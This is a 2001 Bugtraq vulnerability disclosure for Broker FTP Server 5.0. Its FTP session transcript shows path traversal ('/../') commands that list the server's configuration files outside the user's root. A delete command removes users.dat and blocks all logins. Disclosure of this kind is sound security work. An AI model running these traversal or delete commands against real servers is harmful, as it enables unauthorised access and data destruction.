Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Broker Ftp Server 5.0 Vulnerability

From: se00020 () LION CC
Date: Sat, 3 Mar 2001 18:56:23 -0000
Vulnerability:

users can break out of their root directory and list 
directories.
Depending on the priv. you have other commands 
like delete maybe
executed outside of the home. directory.


e:\crap\ was used as homedir. 
deleting files in e:\crap is enabled

Detail:

Problem: Again relative paths.

dir:
listings directories outside of root dir.
Risc: medium-high

230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 
movedtohomedir.txt
-rw-rw-rw-   1 ftp      ftp           11 Mar 02 00:29 
bisontest.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 03 15:59 HTTP
drw-rw-rw-   1 ftp      ftp            0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden 
323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission

ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw-   1 ftp      ftp          175 Nov 19  2000 
UserGrps.dat
-rw-rw-rw-   1 ftp      ftp          154 Mar 03 16:54 
Users.dat
-rw-rw-rw-   1 ftp      ftp            0 Mar 03 16:33 
Users.4800.bak
-rw-rw-rw-   1 ftp      ftp            0 Mar 03 16:34 
Users.4800-Prof.bak
-rw-rw-rw-   1 ftp      ftp           31 Mar 03 16:59 
BannCtrl.ini
-rw-rw-rw-   1 ftp      ftp           34 Mar 03 17:08 
KickCtrl.ini
-rw-rw-rw-   1 ftp      ftp           38 Mar 03 16:37 
Events_1.dat
-rw-rw-rw-   1 ftp      ftp            0 Mar 03 16:53 
Events_lst_1.dat
-rw-rw-rw-   1 ftp      ftp          154 Mar 03 16:54 Kopie 
von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden 
629000,00KB/s

delete:
deleting files outside of root dir.

ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat' 
deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.

C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp> :(

by deleting users.dat, noone will be able to logon ...


put/get commands seem to be secure...

This was tested with win2k and trail version of broker 
ver. 5.0


se00020 () fhs-hagenberg ac at or
se00020 () lion cc
Previous By Date Next
Previous By Thread Next

Current thread: